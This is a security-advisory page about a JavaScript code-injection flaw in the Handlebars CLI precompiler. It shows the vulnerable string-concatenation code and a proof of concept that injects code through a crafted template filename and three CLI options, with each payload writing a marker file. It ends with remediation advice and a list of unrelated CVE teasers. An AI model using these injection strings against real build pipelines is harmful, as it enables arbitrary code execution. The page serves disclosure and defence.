Severity by source
AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Primary rating from NVD.
CVSS VectorNVD
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Lifecycle Timeline
4Blast Radius
ecosystem impact- 3 npm packages depend on handlebars (1 direct, 2 indirect)
Ecosystem-wide dependent count for version 4.0.0.
DescriptionNVD
Summary
The Handlebars CLI precompiler (bin/handlebars / lib/precompiler.js) concatenates user-controlled strings - template file names and several CLI options - directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser.
Description
lib/precompiler.js generates JavaScript source by string-interpolating several values directly into the output. Four distinct injection points exist:
1. Template name injection
// Vulnerable code pattern
output += 'templates["' + template.name + '"] = template(...)';template.name is derived from the file system path. A filename containing " or ']; breaks out of the string literal and injects arbitrary JavaScript.
2. Namespace injection (-n / --namespace)
// Vulnerable code pattern
output += 'var templates = ' + opts.namespace + ' = ' + opts.namespace + ' || {};';opts.namespace is emitted as raw JavaScript. Anything after a ; in the value becomes an additional JavaScript statement.
3. CommonJS path injection (-c / --commonjs)
// Vulnerable code pattern
output += 'var Handlebars = require("' + opts.commonjs + '");';opts.commonjs is interpolated inside double quotes with no escaping, allowing " to close the string and inject further code.
4. AMD path injection (-h / --handlebarPath)
// Vulnerable code pattern
output += "define(['" + opts.handlebarPath + "handlebars.runtime'], ...)";opts.handlebarPath is interpolated inside single quotes, allowing ' to close the array element.
All four injection points result in code that executes when the generated bundle is require()d or loaded in a browser.
Proof of Concept
Template name vector (creates a file pwned on disk):
mkdir -p templates
printf 'Hello' > "templates/evil'] = (function(){require(\"fs\").writeFileSync(\"pwned\",\"1\")})(); //.handlebars"
node bin/handlebars templates -o out.js
node -e 'require("./out.js")'
# Executes injected code, creates ./pwnedNamespace vector:
node bin/handlebars templates -o out.js \
-n "App.ns; require('fs').writeFileSync('pwned2','1'); //"
node -e 'require("./out.js")'CommonJS vector:
node bin/handlebars templates -o out.js \
-c 'handlebars"); require("fs").writeFileSync("pwned3","1"); //'
node -e 'require("./out.js")'AMD vector:
node bin/handlebars templates -o out.js -a \
-h "'); require('fs').writeFileSync('pwned4','1'); // "
node -e 'require("./out.js")'Workarounds
- Validate all CLI inputs before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (
",',;, etc.). - Use a fixed, trusted namespace string passed via a configuration file rather than command-line arguments in automated pipelines.
- Run the precompiler in a sandboxed environment (container with no write access to sensitive paths) to limit the impact of successful exploitation.
- Audit template filenames in any repository or package that is consumed by an automated build pipeline.
AnalysisAI
The Handlebars npm package precompiler (bin/handlebars) allows arbitrary JavaScript injection through unsanitized string concatenation in four distinct code paths: template filenames, namespace option (-n), CommonJS path option (-c), and AMD path option (-h). Attackers who can control template filenames or CLI arguments can inject code that executes when the generated JavaScript bundle is loaded in Node.js or browser environments. Publicly available exploit code exists with multiple proof-of-concept vectors demonstrated, including file system manipulation via require('fs'). CVSS 8.3 reflects local attack vector requiring low privileges and user interaction, with changed scope allowing high confidentiality, integrity, and availability impact.
Technical ContextAI
Handlebars is a widely-deployed templating engine for JavaScript (cpe:2.3:a:*:handlebars:*:*:*:*:*:node.js:*:*). The vulnerability resides in lib/precompiler.js, which generates JavaScript source code by directly interpolating user-controlled values into output strings without escaping special characters. This represents CWE-79 (Improper Neutralization of Input During Web Page Generation), though in this context it manifests as code injection rather than traditional cross-site scripting. The precompiler's string concatenation approach for building JavaScript output creates four distinct injection surfaces: template.name derived from filesystem paths, opts.namespace for namespace configuration, opts.commonjs for CommonJS module paths, and opts.handlebarPath for AMD module paths. Each allows breaking out of string literals using characters like quotes, semicolons, and parentheses to inject arbitrary JavaScript statements that execute during bundle loading.
RemediationAI
Upgrade the handlebars npm package to version 4.7.9 or later, as confirmed in the GitHub release at https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9. The fix commit 68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 addresses the string interpolation vulnerabilities by implementing proper escaping. Until patching is possible, implement input validation to reject template filenames and CLI option values containing JavaScript-significant characters (quotes, semicolons, parentheses). Restrict namespace, CommonJS path, and AMD path options to fixed trusted values defined in configuration files rather than accepting arbitrary command-line arguments. Execute the precompiler in sandboxed containers with restricted filesystem access and no network connectivity to limit impact of successful exploitation. Audit template repositories and CI/CD pipeline configurations to ensure template filenames follow strict naming conventions. See the official GitHub security advisory at https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf for complete remediation guidance.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-16862
GHSA-xjpj-3mr7-gcpf